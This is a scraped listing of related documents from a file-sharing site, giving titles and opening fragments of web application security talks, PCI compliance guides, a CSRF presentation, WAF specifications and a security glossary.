Attack and Penetration Testing 101 Presented by Paul Petefish PaulPetefish@Solutionary.com July 15, 2009 Copyright 2000-2009, Solutionary, Inc. All rights reserved. Version 2.2 Agenda Penetration Testing
More informationOWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN
More informationHow To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
More informationApplication Security: What Does it Take to Build and Test a Trusted App? John Dickson, CISSP Denim Group
Application Security: What Does it Take to Build and Test a Trusted App? John Dickson, CISSP Denim Group Overview What is Application Security? Examples of Potential Vulnerabilities Potential Strategies
More informationFinding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft
Finding and Preventing Cross- Site Request Forgery Tom Gallagher Security Test Lead, Microsoft Agenda Quick reminder of how HTML forms work How cross-site request forgery (CSRF) attack works Obstacles
More informationTECHNICAL AUDITS FOR CERTIFYING EUROPEAN CITIZEN COLLECTION SYSTEMS
TECHNICAL AUDITS FOR CERTIFYING EUROPEAN CITIZEN COLLECTION SYSTEMS Technical audits in accordance with Regulation 211/2011 of the European Union and according to Executional Regulation 1179/2011 of the
More informationWeb Application Firewall Policy File Specification
Web Application Firewall Policy File Specification Foreword This document provides instructions for configuring the Web Application Firewall (WAF) feature of the Java EE language version of the OWASP Enterprise
More informationWeb application testing
CL-WTS Web application testing Classroom 2 days Testing plays a very important role in ensuring security and robustness of web applications. Various approaches from high level auditing through penetration
More informationHack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
More informationPCI Compliance Updates
PCI Compliance Updates E-Commerce / Cloud Security Adam Goslin, Chief Operations Officer AGoslin@HighBitSecurity.com Direct: 248.388.4328 PCI Guidance Google: PCI e-commerce guidance https://www.pcisecuritystandards.org/pdfs/pci_dss_v2_ecommerce_guidelines.pdf
More informationThe Security of MDM systems. Hack In Paris 2013 Sebastien Andrivet
The Security of MDM systems Hack In Paris 2013 Sebastien Andrivet Who am I? Sebastien Andrivet Switzerland (Geneva) Specialized in security Mobiles (ios, Android) Forensic Developer C++, x86 and ARM (Cyberfeminist
More informationF5 and Microsoft Exchange Security Solutions
F5 PARTNERSHIP SOLUTION GUIDE F5 and Microsoft Exchange Security Solutions Deploying a service-oriented perimeter for Microsoft Exchange WHAT'S INSIDE Pre-Authentication Mobile Device Security Web Application
More informationReducing Application Vulnerabilities by Security Engineering
Reducing Application Vulnerabilities by Security Engineering - Subash Newton Manager Projects (Non Functional Testing, PT CoE Group) 2008, Cognizant Technology Solutions. All Rights Reserved. The information
More informationCutting the Cost of Application Security
WHITE PAPER Cutting the Cost of Application Security Web application attacks can result in devastating data breaches and application downtime, costing companies millions of dollars in fines, brand damage,
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More information